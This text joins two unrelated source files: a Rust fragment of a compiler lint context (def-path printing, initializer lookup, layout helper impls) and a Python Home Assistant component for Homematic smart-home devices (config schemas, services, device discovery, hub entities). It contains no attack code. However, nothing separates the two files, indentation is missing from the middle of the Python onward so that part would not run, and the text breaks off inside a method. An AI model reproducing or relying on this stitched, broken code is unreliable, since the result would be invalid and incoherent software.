    pub fn get_def_path(&self, def_id: DefId) -> Vec<Symbol> {
        /// Minimal `Printer` that collects path segments into `path`
        /// instead of rendering them; type/region/const printing is
        /// unreachable because generic args are ignored below.
        struct LintPathPrinter<'tcx> {
            tcx: TyCtxt<'tcx>,
            path: Vec<Symbol>,
        }

        impl<'tcx> Printer<'tcx> for LintPathPrinter<'tcx> {
            fn tcx(&self) -> TyCtxt<'tcx> {
                self.tcx
            }

            fn print_region(&mut self, _region: ty::Region<'_>) -> Result<(), PrintError> {
                unreachable!(); // because `print_path_with_generic_args` ignores the `GenericArgs`
            }

            fn print_type(&mut self, _ty: Ty<'tcx>) -> Result<(), PrintError> {
                unreachable!(); // because `print_path_with_generic_args` ignores the `GenericArgs`
            }

            fn print_dyn_existential(
                &mut self,
                _predicates: &'tcx ty::List<ty::PolyExistentialPredicate<'tcx>>,
            ) -> Result<(), PrintError> {
                unreachable!(); // because `print_path_with_generic_args` ignores the `GenericArgs`
            }

            fn print_const(&mut self, _ct: ty::Const<'tcx>) -> Result<(), PrintError> {
                unreachable!(); // because `print_path_with_generic_args` ignores the `GenericArgs`
            }

            fn print_crate_name(&mut self, cnum: CrateNum) -> Result<(), PrintError> {
                // Path starts over at the crate root.
                self.path = vec![self.tcx.crate_name(cnum)];
                Ok(())
            }

            fn print_path_with_qualified(
                &mut self,
                self_ty: Ty<'tcx>,
                trait_ref: Option<ty::TraitRef<'tcx>>,
            ) -> Result<(), PrintError> {
                // Inherent impls on an ADT print as the ADT's own path.
                if trait_ref.is_none()
                    && let ty::Adt(def, args) = self_ty.kind()
                {
                    return self.print_def_path(def.did(), args);
                }

                // This shouldn't ever be needed, but just in case:
                with_no_trimmed_paths!({
                    self.path = vec![match trait_ref {
                        Some(trait_ref) => Symbol::intern(&format!("{trait_ref:?}")),
                        None => Symbol::intern(&format!("<{self_ty}>")),
                    }];
                    Ok(())
                })
            }

            fn print_path_with_impl(
                &mut self,
                print_prefix: impl FnOnce(&mut Self) -> Result<(), PrintError>,
                self_ty: Ty<'tcx>,
                trait_ref: Option<ty::TraitRef<'tcx>>,
            ) -> Result<(), PrintError> {
                print_prefix(self)?;

                // This shouldn't ever be needed, but just in case:
                self.path.push(match trait_ref {
                    Some(trait_ref) => {
                        with_no_trimmed_paths!(Symbol::intern(&format!(
                            "<impl {} for {}>",
                            trait_ref.print_only_trait_path(),
                            self_ty
                        )))
                    }
                    None => {
                        with_no_trimmed_paths!(Symbol::intern(&format!("<impl {self_ty}>")))
                    }
                });

                Ok(())
            }

            fn print_path_with_simple(
                &mut self,
                print_prefix: impl FnOnce(&mut Self) -> Result<(), PrintError>,
                disambiguated_data: &DisambiguatedDefPathData,
            ) -> Result<(), PrintError> {
                print_prefix(self)?;

                // Skip `::{{extern}}` blocks and `::{{constructor}}` on tuple/unit structs.
                if let DefPathData::ForeignMod | DefPathData::Ctor = disambiguated_data.data {
                    return Ok(());
                }

                self.path.push(match disambiguated_data.data.get_opt_name() {
                    Some(sym) => sym,
                    None => Symbol::intern(&disambiguated_data.data.to_string()),
                });
                Ok(())
            }

            fn print_path_with_generic_args(
                &mut self,
                print_prefix: impl FnOnce(&mut Self) -> Result<(), PrintError>,
                _args: &[GenericArg<'tcx>],
            ) -> Result<(), PrintError> {
                // Generic arguments are irrelevant for the symbol path.
                print_prefix(self)
            }
        }

        let mut p = LintPathPrinter { tcx: self.tcx, path: vec![] };
        p.print_def_path(def_id, &[]).unwrap();
        p.path
    }

    /// Returns the associated type `name` for `self_ty` as an implementation of `trait_id`.
    /// Do not invoke without first verifying that the type implements the trait.
    pub fn get_associated_type(
        &self,
        self_ty: Ty<'tcx>,
        trait_id: DefId,
        name: Symbol,
    ) -> Option<Ty<'tcx>> {
        let tcx = self.tcx;
        tcx.associated_items(trait_id)
            .find_by_ident_and_kind(tcx, Ident::with_dummy_span(name), ty::AssocTag::Type, trait_id)
            .and_then(|assoc| {
                // Project `<self_ty as Trait>::Name` and normalize it away.
                let proj = Ty::new_projection(tcx, assoc.def_id, [self_ty]);
                tcx.try_normalize_erasing_regions(self.typing_env(), proj).ok()
            })
    }

    /// Returns the effective precedence of an expression for the purpose of
    /// rendering diagnostic. This is not the same as the precedence that would
    /// be used for pretty-printing HIR by rustc_hir_pretty.
    pub fn precedence(&self, expr: &hir::Expr<'_>) -> ExprPrecedence {
        // An attribute counts only if it was written by the user (i.e. its
        // span does not come from desugaring).
        let has_attr = |id: hir::HirId| -> bool {
            for attr in self.tcx.hir_attrs(id) {
                if attr.span().desugaring_kind().is_none() {
                    return true;
                }
            }
            false
        };
        expr.precedence(&has_attr)
    }

    /// If the given expression is a local binding, find the initializer expression.
    /// If that initializer expression is another local binding, find its initializer again.
    ///
    /// This process repeats as long as possible (but usually no more than once).
    /// Type-check adjustments are not taken in account in this function.
    ///
    /// Examples:
    /// ```
    /// let abc = 1;
    /// let def = abc + 2;
    /// //        ^^^^^^^ output
    /// let def = def;
    /// dbg!(def);
    /// //   ^^^ input
    /// ```
    pub fn expr_or_init<'a>(&self, mut expr: &'a hir::Expr<'tcx>) -> &'a hir::Expr<'tcx> {
        expr = expr.peel_blocks();

        while let hir::ExprKind::Path(ref qpath) = expr.kind
            && let Some(parent_node) = match self.qpath_res(qpath, expr.hir_id) {
                Res::Local(hir_id) => Some(self.tcx.parent_hir_node(hir_id)),
                _ => None,
            }
            && let Some(init) = match parent_node {
                hir::Node::Expr(expr) => Some(expr),
                hir::Node::LetStmt(hir::LetStmt {
                    init,
                    // Binding is immutable, init cannot be re-assigned
                    pat: Pat { kind: PatKind::Binding(BindingMode::NONE, ..), .. },
                    ..
                }) => *init,
                _ => None,
            }
        {
            expr = init.peel_blocks();
        }
        expr
    }

    /// If the given expression is a local binding, find the initializer expression.
    /// If that initializer expression is another local or **outside** (`const`/`static`)
    /// binding, find its initializer again.
    ///
    /// This process repeats as long as possible (but usually no more than once).
    /// Type-check adjustments are not taken in account in this function.
    ///
    /// Examples:
    /// ```
    /// const ABC: i32 = 1;
    /// //               ^ output
    /// let def = ABC;
    /// dbg!(def);
    /// //   ^^^ input
    ///
    /// // or...
    /// let abc = 1;
    /// let def = abc + 2;
    /// //        ^^^^^^^ output
    /// dbg!(def);
    /// //   ^^^ input
    /// ```
    pub fn expr_or_init_with_outside_body<'a>(
        &self,
        mut expr: &'a hir::Expr<'tcx>,
    ) -> &'a hir::Expr<'tcx> {
        expr = expr.peel_blocks();

        while let hir::ExprKind::Path(ref qpath) = expr.kind
            && let Some(parent_node) = match self.qpath_res(qpath, expr.hir_id) {
                Res::Local(hir_id) => Some(self.tcx.parent_hir_node(hir_id)),
                // Unlike `expr_or_init`, also follow crate-local defs.
                Res::Def(_, def_id) => self.tcx.hir_get_if_local(def_id),
                _ => None,
            }
            && let Some(init) = match parent_node {
                hir::Node::Expr(expr) => Some(expr),
                hir::Node::LetStmt(hir::LetStmt {
                    init,
                    // Binding is immutable, init cannot be re-assigned
                    pat: Pat { kind: PatKind::Binding(BindingMode::NONE, ..), .. },
                    ..
                }) => *init,
                hir::Node::Item(item) => match item.kind {
                    // FIXME(mgca): figure out how to handle ConstArgKind::Path (or don't but add warning in docs here)
                    hir::ItemKind::Const(.., hir::ConstItemRhs::Body(body_id))
                    | hir::ItemKind::Static(.., body_id) => Some(self.tcx.hir_body(body_id).value),
                    _ => None,
                },
                _ => None,
            }
        {
            expr = init.peel_blocks();
        }
        expr
    }
}
// Lets `LateContext` be used wherever a target data layout is required;
// simply forwards to the `TyCtxt`'s data layout.
impl<'tcx> abi::HasDataLayout for LateContext<'tcx> {
    #[inline]
    fn data_layout(&self) -> &abi::TargetDataLayout {
        &self.tcx.data_layout
    }
}
// Exposes the type context for layout helpers.
impl<'tcx> ty::layout::HasTyCtxt<'tcx> for LateContext<'tcx> {
    #[inline]
    fn tcx(&self) -> TyCtxt<'tcx> {
        self.tcx
    }
}
// Exposes this context's typing environment (see `LateContext::typing_env`)
// for layout helpers.
impl<'tcx> ty::layout::HasTypingEnv<'tcx> for LateContext<'tcx> {
    #[inline]
    fn typing_env(&self) -> ty::TypingEnv<'tcx> {
        self.typing_env()
    }
}
// Enables `.layout_of(ty)` on `LateContext`; layout errors are passed
// through unchanged rather than turned into diagnostics.
impl<'tcx> LayoutOfHelpers<'tcx> for LateContext<'tcx> {
    type LayoutOfResult = Result<TyAndLayout<'tcx>, LayoutError<'tcx>>;

    #[inline]
    fn handle_layout_err(&self, err: LayoutError<'tcx>, _: Span, _: Ty<'tcx>) -> LayoutError<'tcx> {
        err
    }
}
"""
Support for Homematic devices.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/homematic/
"""
import os
import time
import logging
from datetime import timedelta
from functools import partial
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.const import (
EVENT_HOMEASSISTANT_STOP, STATE_UNKNOWN, CONF_USERNAME, CONF_PASSWORD,
CONF_PLATFORM, CONF_HOSTS, CONF_NAME, ATTR_ENTITY_ID)
from homeassistant.helpers import discovery
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.event import track_time_interval
from homeassistant.config import load_yaml_config_file
# Component identity and the external library it depends on.
DOMAIN = 'homematic'
REQUIREMENTS = ["pyhomematic==0.1.22"]

# Polling intervals: hub state every 5 minutes, system variables every 30s.
SCAN_INTERVAL_HUB = timedelta(seconds=300)
SCAN_INTERVAL_VARIABLES = timedelta(seconds=30)

# Discovery type identifiers, one per Home Assistant platform this
# component can create entities for.
DISCOVER_SWITCHES = 'homematic.switch'
DISCOVER_LIGHTS = 'homematic.light'
DISCOVER_SENSORS = 'homematic.sensor'
DISCOVER_BINARY_SENSORS = 'homematic.binary_sensor'
DISCOVER_COVER = 'homematic.cover'
DISCOVER_CLIMATE = 'homematic.climate'

# Keys used in discovery payloads and service call data.
ATTR_DISCOVER_DEVICES = 'devices'
ATTR_PARAM = 'param'
ATTR_CHANNEL = 'channel'
ATTR_NAME = 'name'
ATTR_ADDRESS = 'address'
ATTR_VALUE = 'value'
ATTR_PROXY = 'proxy'

# Events fired on the Home Assistant bus for device key/impulse events.
EVENT_KEYPRESS = 'homematic.keypress'
EVENT_IMPULSE = 'homematic.impulse'

# Services registered by setup().
SERVICE_VIRTUALKEY = 'virtualkey'
SERVICE_RECONNECT = 'reconnect'
SERVICE_SET_VAR_VALUE = 'set_var_value'
SERVICE_SET_DEV_VALUE = 'set_dev_value'
# Maps each discovery type to the pyhomematic device class names it covers.
HM_DEVICE_TYPES = {
    DISCOVER_SWITCHES: [
        'Switch', 'SwitchPowermeter', 'IOSwitch', 'IPSwitch',
        'IPSwitchPowermeter', 'KeyMatic', 'HMWIOSwitch'],
    DISCOVER_LIGHTS: ['Dimmer', 'KeyDimmer'],
    DISCOVER_SENSORS: [
        'SwitchPowermeter', 'Motion', 'MotionV2', 'RemoteMotion', 'MotionIP',
        'ThermostatWall', 'AreaThermostat', 'RotaryHandleSensor',
        'WaterSensor', 'PowermeterGas', 'LuxSensor', 'WeatherSensor',
        'WeatherStation', 'ThermostatWall2', 'TemperatureDiffSensor',
        'TemperatureSensor', 'CO2Sensor', 'IPSwitchPowermeter', 'HMWIOSwitch'],
    DISCOVER_CLIMATE: [
        'Thermostat', 'ThermostatWall', 'MAXThermostat', 'ThermostatWall2',
        'MAXWallThermostat', 'IPThermostat'],
    DISCOVER_BINARY_SENSORS: [
        'ShutterContact', 'Smoke', 'SmokeV2', 'Motion', 'MotionV2',
        'RemoteMotion', 'WeatherSensor', 'TiltSensor', 'IPShutterContact',
        'HMWIOSwitch', 'MaxShutterContact'],
    DISCOVER_COVER: ['Blind', 'KeyBlind']
}

# Data point names excluded from discovery (used by the platform modules;
# NOTE(review): usage is outside this file — confirm against sensor platform).
HM_IGNORE_DISCOVERY_NODE = [
    'ACTUAL_TEMPERATURE',
    'ACTUAL_HUMIDITY'
]

# Maps a Homematic attribute name to [HA attribute name, value translation
# map]; an empty map means the raw value is used as-is.
HM_ATTRIBUTE_SUPPORT = {
    'LOWBAT': ['battery', {0: 'High', 1: 'Low'}],
    'ERROR': ['sabotage', {0: 'No', 1: 'Yes'}],
    'RSSI_DEVICE': ['rssi', {}],
    'VALVE_STATE': ['valve', {}],
    'BATTERY_STATE': ['battery', {}],
    'CONTROL_MODE': ['mode', {0: 'Auto', 1: 'Manual', 2: 'Away', 3: 'Boost'}],
    'POWER': ['power', {}],
    'CURRENT': ['current', {}],
    'VOLTAGE': ['voltage', {}],
    'WORKING': ['working', {0: 'No', 1: 'Yes'}],
}

# Event parameter names treated as key presses (fired as EVENT_KEYPRESS).
HM_PRESS_EVENTS = [
    'PRESS_SHORT',
    'PRESS_LONG',
    'PRESS_CONT',
    'PRESS_LONG_RELEASE',
    'PRESS',
]

# Event parameter names treated as impulses (fired as EVENT_IMPULSE).
HM_IMPULSE_EVENTS = [
    'SEQUENCE_OK',
]
_LOGGER = logging.getLogger(__name__)

# Accepted values for the `resolvenames` option (False disables resolution).
CONF_RESOLVENAMES_OPTIONS = [
    'metadata',
    'json',
    'xml',
    False
]

# Keys under which component state is stored in hass.data.
DATA_HOMEMATIC = 'homematic'
DATA_DELAY = 'homematic_delay'
DATA_DEVINIT = 'homematic_devinit'
DATA_STORE = 'homematic_store'

# Configuration option names.
CONF_LOCAL_IP = 'local_ip'
CONF_LOCAL_PORT = 'local_port'
CONF_IP = 'ip'
CONF_PORT = 'port'
CONF_CALLBACK_IP = "callback_ip"
CONF_CALLBACK_PORT = "callback_port"
CONF_RESOLVENAMES = 'resolvenames'
CONF_VARIABLES = 'variables'
CONF_DEVICES = 'devices'
CONF_DELAY = 'delay'
CONF_PRIMARY = 'primary'

# Defaults applied by the config schemas below.
DEFAULT_LOCAL_IP = "0.0.0.0"
DEFAULT_LOCAL_PORT = 0
DEFAULT_RESOLVENAMES = False
DEFAULT_PORT = 2001
DEFAULT_USERNAME = "Admin"
DEFAULT_PASSWORD = ""
DEFAULT_VARIABLES = False
DEFAULT_DEVICES = True
DEFAULT_DELAY = 0.5
DEFAULT_PRIMARY = False
# Schema for a single manually-configured Homematic device on a platform.
DEVICE_SCHEMA = vol.Schema({
    vol.Required(CONF_PLATFORM): "homematic",
    vol.Required(ATTR_NAME): cv.string,
    vol.Required(ATTR_ADDRESS): cv.string,
    vol.Required(ATTR_PROXY): cv.string,
    vol.Optional(ATTR_CHANNEL, default=1): vol.Coerce(int),
    vol.Optional(ATTR_PARAM): cv.string,
})

# Component configuration: one or more named hosts (CCU/Homegear) plus
# local XML-RPC server settings.
CONFIG_SCHEMA = vol.Schema({
    DOMAIN: vol.Schema({
        vol.Required(CONF_HOSTS): {cv.match_all: {
            vol.Required(CONF_IP): cv.string,
            vol.Optional(CONF_PORT, default=DEFAULT_PORT):
                cv.port,
            vol.Optional(CONF_USERNAME, default=DEFAULT_USERNAME): cv.string,
            vol.Optional(CONF_PASSWORD, default=DEFAULT_PASSWORD): cv.string,
            vol.Optional(CONF_VARIABLES, default=DEFAULT_VARIABLES):
                cv.boolean,
            vol.Optional(CONF_RESOLVENAMES, default=DEFAULT_RESOLVENAMES):
                vol.In(CONF_RESOLVENAMES_OPTIONS),
            vol.Optional(CONF_DEVICES, default=DEFAULT_DEVICES): cv.boolean,
            vol.Optional(CONF_PRIMARY, default=DEFAULT_PRIMARY): cv.boolean,
            vol.Optional(CONF_CALLBACK_IP): cv.string,
            vol.Optional(CONF_CALLBACK_PORT): cv.port,
        }},
        vol.Optional(CONF_LOCAL_IP, default=DEFAULT_LOCAL_IP): cv.string,
        vol.Optional(CONF_LOCAL_PORT, default=DEFAULT_LOCAL_PORT): cv.port,
        vol.Optional(CONF_DELAY, default=DEFAULT_DELAY): vol.Coerce(float),
    }),
}, extra=vol.ALLOW_EXTRA)

# Service call schemas (addresses and params are upper-cased on input).
SCHEMA_SERVICE_VIRTUALKEY = vol.Schema({
    vol.Required(ATTR_ADDRESS): vol.All(cv.string, vol.Upper),
    vol.Required(ATTR_CHANNEL): vol.Coerce(int),
    vol.Required(ATTR_PARAM): cv.string,
    vol.Optional(ATTR_PROXY): cv.string,
})

SCHEMA_SERVICE_SET_VAR_VALUE = vol.Schema({
    vol.Required(ATTR_NAME): cv.string,
    vol.Required(ATTR_VALUE): cv.match_all,
    vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
})

SCHEMA_SERVICE_SET_DEV_VALUE = vol.Schema({
    vol.Required(ATTR_ADDRESS): vol.All(cv.string, vol.Upper),
    vol.Required(ATTR_CHANNEL): vol.Coerce(int),
    vol.Required(ATTR_PARAM): vol.All(cv.string, vol.Upper),
    vol.Required(ATTR_VALUE): cv.match_all,
    vol.Optional(ATTR_PROXY): cv.string,
})

SCHEMA_SERVICE_RECONNECT = vol.Schema({})
def virtualkey(hass, address, channel, param, proxy=None):
    """Send a virtual keypress to the Homematic controller."""
    service_data = {
        ATTR_ADDRESS: address,
        ATTR_CHANNEL: channel,
        ATTR_PARAM: param,
        ATTR_PROXY: proxy,
    }
    hass.services.call(DOMAIN, SERVICE_VIRTUALKEY, service_data)
def set_var_value(hass, entity_id, value):
    """Change the value of a Homematic system variable."""
    # NOTE(review): SCHEMA_SERVICE_SET_VAR_VALUE requires ATTR_NAME, which
    # this helper never sends — confirm against the service schema.
    service_data = {
        ATTR_ENTITY_ID: entity_id,
        ATTR_VALUE: value,
    }
    hass.services.call(DOMAIN, SERVICE_SET_VAR_VALUE, service_data)
def set_dev_value(hass, address, channel, param, value, proxy=None):
    """Set a data point value on a Homematic device."""
    service_data = {
        ATTR_ADDRESS: address,
        ATTR_CHANNEL: channel,
        ATTR_PARAM: param,
        ATTR_VALUE: value,
        ATTR_PROXY: proxy,
    }
    hass.services.call(DOMAIN, SERVICE_SET_DEV_VALUE, service_data)
def reconnect(hass):
    """Reconnect to CCU/Homegear."""
    empty_payload = {}
    hass.services.call(DOMAIN, SERVICE_RECONNECT, empty_payload)
# pylint: disable=unused-argument
def setup(hass, config):
    """Setup the Homematic component.

    Builds the pyhomematic connection from the configured hosts, starts
    its server thread, creates one HMHub per physical host, and registers
    the virtualkey / set_var_value / set_dev_value / reconnect services.
    Returns True on completion (connection errors are not surfaced here).
    """
    from pyhomematic import HMConnection

    hass.data[DATA_DELAY] = config[DOMAIN].get(CONF_DELAY)
    hass.data[DATA_DEVINIT] = {}
    hass.data[DATA_STORE] = []

    # create hosts list for pyhomematic
    remotes = {}
    hosts = {}
    for rname, rconfig in config[DOMAIN][CONF_HOSTS].items():
        server = rconfig.get(CONF_IP)

        remotes[rname] = {}
        remotes[rname][CONF_IP] = server
        remotes[rname][CONF_PORT] = rconfig.get(CONF_PORT)
        remotes[rname][CONF_RESOLVENAMES] = rconfig.get(CONF_RESOLVENAMES)
        remotes[rname][CONF_USERNAME] = rconfig.get(CONF_USERNAME)
        remotes[rname][CONF_PASSWORD] = rconfig.get(CONF_PASSWORD)
        remotes[rname]['callbackip'] = rconfig.get(CONF_CALLBACK_IP)
        remotes[rname]['callbackport'] = rconfig.get(CONF_CALLBACK_PORT)

        # One hub per physical server; a host marked `primary` wins over
        # whichever interface happened to be seen first.
        if server not in hosts or rconfig.get(CONF_PRIMARY):
            hosts[server] = {
                CONF_VARIABLES: rconfig.get(CONF_VARIABLES),
                CONF_NAME: rname,
            }
        hass.data[DATA_DEVINIT][rname] = rconfig.get(CONF_DEVICES)

    # Create server thread
    bound_system_callback = partial(_system_callback_handler, hass, config)
    hass.data[DATA_HOMEMATIC] = HMConnection(
        local=config[DOMAIN].get(CONF_LOCAL_IP),
        localport=config[DOMAIN].get(CONF_LOCAL_PORT),
        remotes=remotes,
        systemcallback=bound_system_callback,
        interface_id="homeassistant"
    )

    # Start server thread, connect to peer, initialize to receive events
    hass.data[DATA_HOMEMATIC].start()

    # Stops server when Homeassistant is shutting down
    hass.bus.listen_once(
        EVENT_HOMEASSISTANT_STOP, hass.data[DATA_HOMEMATIC].stop)

    # init homematic hubs
    entity_hubs = []
    for _, hub_data in hosts.items():
        entity_hubs.append(HMHub(
            hass, hub_data[CONF_NAME], hub_data[CONF_VARIABLES]))

    # register homematic services
    descriptions = load_yaml_config_file(
        os.path.join(os.path.dirname(__file__), 'services.yaml'))

    def _hm_service_virtualkey(service):
        """Service handle virtualkey services."""
        address = service.data.get(ATTR_ADDRESS)
        channel = service.data.get(ATTR_CHANNEL)
        param = service.data.get(ATTR_PARAM)

        # device not found
        hmdevice = _device_from_servicecall(hass, service)
        if hmdevice is None:
            _LOGGER.error("%s not found for service virtualkey!", address)
            return

        # if param exists for this device
        if param not in hmdevice.ACTIONNODE:
            _LOGGER.error("%s not datapoint in hm device %s", param, address)
            return

        # channel exists?
        if channel not in hmdevice.ACTIONNODE[param]:
            _LOGGER.error("%i is not a channel in hm device %s",
                          channel, address)
            return

        # call key
        hmdevice.actionNodeData(param, True, channel)

    hass.services.register(
        DOMAIN, SERVICE_VIRTUALKEY, _hm_service_virtualkey,
        descriptions[DOMAIN][SERVICE_VIRTUALKEY],
        schema=SCHEMA_SERVICE_VIRTUALKEY)

    def _service_handle_value(service):
        """Set value on homematic variable."""
        entity_ids = service.data.get(ATTR_ENTITY_ID)
        name = service.data[ATTR_NAME]
        value = service.data[ATTR_VALUE]

        # With explicit entity_ids, restrict to matching hubs; otherwise
        # apply to every hub.
        if entity_ids:
            entities = [entity for entity in entity_hubs if
                        entity.entity_id in entity_ids]
        else:
            entities = entity_hubs

        if not entities:
            _LOGGER.error("Homematic controller not found!")
            return

        for hub in entities:
            hub.hm_set_variable(name, value)

    hass.services.register(
        DOMAIN, SERVICE_SET_VAR_VALUE, _service_handle_value,
        descriptions[DOMAIN][SERVICE_SET_VAR_VALUE],
        schema=SCHEMA_SERVICE_SET_VAR_VALUE)

    def _service_handle_reconnect(service):
        """Reconnect to all homematic hubs."""
        hass.data[DATA_HOMEMATIC].reconnect()

    hass.services.register(
        DOMAIN, SERVICE_RECONNECT, _service_handle_reconnect,
        descriptions[DOMAIN][SERVICE_RECONNECT],
        schema=SCHEMA_SERVICE_RECONNECT)

    def _service_handle_device(service):
        """Service handle set_dev_value services."""
        address = service.data.get(ATTR_ADDRESS)
        channel = service.data.get(ATTR_CHANNEL)
        param = service.data.get(ATTR_PARAM)
        value = service.data.get(ATTR_VALUE)

        # device not found
        hmdevice = _device_from_servicecall(hass, service)
        if hmdevice is None:
            _LOGGER.error("%s not found!", address)
            return

        # call key
        hmdevice.setValue(param, value, channel)

    hass.services.register(
        DOMAIN, SERVICE_SET_DEV_VALUE, _service_handle_device,
        descriptions[DOMAIN][SERVICE_SET_DEV_VALUE],
        schema=SCHEMA_SERVICE_SET_DEV_VALUE)

    return True
def _system_callback_handler(hass, config, src, *args):
"""Callback handler."""
if src == 'newDevices':
_LOGGER.debug("newDevices with: %s", args)
# pylint: disable=unused-variable
(interface_id, dev_descriptions) = args
proxy = interface_id.split('-')[-1]
# device support active?
if not hass.data[DATA_DEVINIT][proxy]:
return
##
# Get list of all keys of the devices (ignoring channels)
key_dict = {}
for dev in dev_descriptions:
key_dict[dev['ADDRESS'].split(':')[0]] = True
##
# remove device they allready init by HA
tmp_devs = key_dict.copy()
for dev in tmp_devs:
if dev in hass.data[DATA_STORE]:
del key_dict[dev]
else:
hass.data[DATA_STORE].append(dev)
# Register EVENTS
# Search all device with a EVENTNODE that include data
bound_event_callback = partial(_hm_event_handler, hass, proxy)
for dev in key_dict:
hmdevice = hass.data[DATA_HOMEMATIC].devices[proxy].get(dev)
# have events?
if len(hmdevice.EVENTNODE) > 0:
_LOGGER.debug("Register Events from %s", dev)
hmdevice.setEventCallback(callback=bound_event_callback,
bequeath=True)
# If configuration allows autodetection of devices,
# all devices not configured are added.
if key_dict:
for component_name, discovery_type in (
('switch', DISCOVER_SWITCHES),
('light', DISCOVER_LIGHTS),
('cover', DISCOVER_COVER),
('binary_sensor', DISCOVER_BINARY_SENSORS),
('sensor', DISCOVER_SENSORS),
('climate', DISCOVER_CLIMATE)):
# Get all devices of a specific type
found_devices = _get_devices(
hass, discovery_type, key_dict, proxy)
# When devices of this type are found
# they are setup in HA and an event is fired
if found_devices:
# Fire discovery event
discovery.load_platform(hass, component_name, DOMAIN, {
ATTR_DISCOVER_DEVICES: found_devices
}, config)
def _get_devices(hass, discovery_type, keys, proxy):
"""Get the Homematic devices for given discovery_type."""
device_arr = []
for key in keys:
device = hass.data[DATA_HOMEMATIC].devices[proxy][key]
class_name = device.__class__.__name__
metadata = {}
# Class supported by discovery type
if class_name not in HM_DEVICE_TYPES[discovery_type]:
continue
# Load metadata if needed to generate a param list
if discovery_type == DISCOVER_SENSORS:
metadata.update(device.SENSORNODE)
elif discovery_type == DISCOVER_BINARY_SENSORS:
metadata.update(device.BINARYNODE)
else:
metadata.update({None: device.ELEMENT})
if metadata:
# Generate options for 1...n elements with 1...n params
for param, channels in metadata.items():
if param in HM_IGNORE_DISCOVERY_NODE:
continue
# Add devices
_LOGGER.debug("%s: Handling %s: %s: %s",
discovery_type, key, param, channels)
for channel in channels:
name = _create_ha_name(
name=device.NAME, channel=channel, param=param,
count=len(channels)
)
device_dict = {
CONF_PLATFORM: "homematic",
ATTR_ADDRESS: key,
ATTR_PROXY: proxy,
ATTR_NAME: name,
ATTR_CHANNEL: channel
}
if param is not None:
device_dict[ATTR_PARAM] = param
# Add new device
try:
DEVICE_SCHEMA(device_dict)
device_arr.append(device_dict)
except vol.MultipleInvalid as err:
_LOGGER.error("Invalid device config: %s",
str(err))
else:
_LOGGER.debug("Got no params for %s", key)
_LOGGER.debug("%s autodiscovery done: %s", discovery_type, str(device_arr))
return device_arr
def _create_ha_name(name, channel, param, count):
"""Generate a unique object name."""
# HMDevice is a simple device
if count == 1 and param is None:
return name
# Has multiple elements/channels
if count > 1 and param is None:
return "{} {}".format(name, channel)
# With multiple param first elements
if count == 1 and param is not None:
return "{} {}".format(name, param)
# Multiple param on object with multiple elements
if count > 1 and param is not None:
return "{} {} {}".format(name, channel, param)
def _hm_event_handler(hass, proxy, device, caller, attribute, value):
"""Handle all pyhomematic device events."""
try:
channel = int(device.split(":")[1])
address = device.split(":")[0]
hmdevice = hass.data[DATA_HOMEMATIC].devices[proxy].get(address)
except (TypeError, ValueError):
_LOGGER.error("Event handling channel convert error!")
return
# is not a event?
if attribute not in hmdevice.EVENTNODE:
return
_LOGGER.debug("Event %s for %s channel %i", attribute,
hmdevice.NAME, channel)
# keypress event
if attribute in HM_PRESS_EVENTS:
hass.add_job(hass.bus.async_fire(EVENT_KEYPRESS, {
ATTR_NAME: hmdevice.NAME,
ATTR_PARAM: attribute,
ATTR_CHANNEL: channel
}))
return
# impulse event
if attribute in HM_IMPULSE_EVENTS:
hass.add_job(hass.bus.async_fire(EVENT_KEYPRESS, {
ATTR_NAME: hmdevice.NAME,
ATTR_CHANNEL: channel
}))
return
_LOGGER.warning("Event is unknown and not forwarded to HA")
def _device_from_servicecall(hass, service):
"""Extract homematic device from service call."""
address = service.data.get(ATTR_ADDRESS)
proxy = service.data.get(ATTR_PROXY)
if proxy:
return hass.data[DATA_HOMEMATIC].devices[proxy].get(address)
for _, devices in hass.data[DATA_HOMEMATIC].devices.items():
if address in devices:
return devices[address]
class HMHub(Entity):
"""The Homematic hub. I.e. CCU2/HomeGear."""
def __init__(self, hass, name, use_variables):
"""Initialize Homematic hub."""
self.hass = hass
self.entity_id = "{}.{}".format(DOMAIN, name.lower())
self._homematic = hass.data[DATA_HOMEMATIC]
self._variables = {}
self._name = name
self._state = STATE_UNKNOWN
self._use_variables = use_variables
# load data
track_time_interval(hass, self._update_hub, SCAN_INTERVAL_HUB)
self._update_hub(None)
if self._use_variables:
track_time_interval(
hass, self._update_variables, SCAN_INTERVAL_VARIABLES)
self._update_variables(None)
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def should_poll(self):
"""Return false. Homematic Hub object update variable."""
return False
@property
def state(self):
"""Return the state of the entity."""
return self._state
@property
def state_attributes(self):
"""Return the state attributes."""
attr = self._variables.copy()
return attr
@property
def icon(self):
"""Return the icon to use in the frontend, if any."""
return "mdi:gradient"
def _update_hub(self, now):
"""Retrieve latest state."""
state = self._homematic.getServiceMessages(self._name)
self._state = STATE_UNKNOWN if state is None else len(state)
self.schedule_update_ha_state()
def _update_variables(self, now):
"""Retrive all variable data and update hmvariable states."""
variables = self._homematic.getAllSystemVariables(self._name)
if variables is None:
return
state_change = False
for key, value in variables.items():
if key in self._variables and value == self._variables[key]:
continue
state_change = True
self._variables.update({key: value})
if state_change:
self.schedule_update_ha_state()
def hm_set_variable(self, name, value):
"""Set variable on homematic controller."""
if name not in self._variables:
_LOGGER.error("Variable %s not found on %s", name, self.name)
return
old_value = self._variables.get(name)
if isinstance(old_value, bool):
value = cv.boolean(value)
else:
value = float(value)
self._homematic.setSystemVariable(self.name, name, value)
self._variables.update({name: value})
self.schedule_update_ha_state()
class HMDevice(Entity):
"""The Homematic device base object."""
def __init__(self, hass, config):
"""Initialize a generic Homematic device."""
self.hass = hass
self._homematic = hass.data[DATA_HOMEMATIC]
self._name = config.get(ATTR_NAME)
self._address = config.get(ATTR_ADDRESS)
self._proxy = config.get(ATTR_PROXY)
self._channel = config.get(ATTR_CHANNEL)
self._state = config.get(ATTR_PARAM)
self._data = {}
self._hmdevice = None
self._connected = False
self._available = False
# Set param to uppercase
if self._state:
self._state = self._state.upper()
@property
def should_poll(self):
"""Return false. Homematic states are pushed by the XML RPC Server."""
return False
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def assumed_state(self):
"""Return true if unable to access real state of the device."""
return not self._available
@property
def available(self):
"""Return true if device is available."""
return self._available
@property
def device_state_attributes(self):
"""Return device specific state attributes."""
attr = {}
# no data available to create
if not self.available:
return attr
# Generate an attributes list
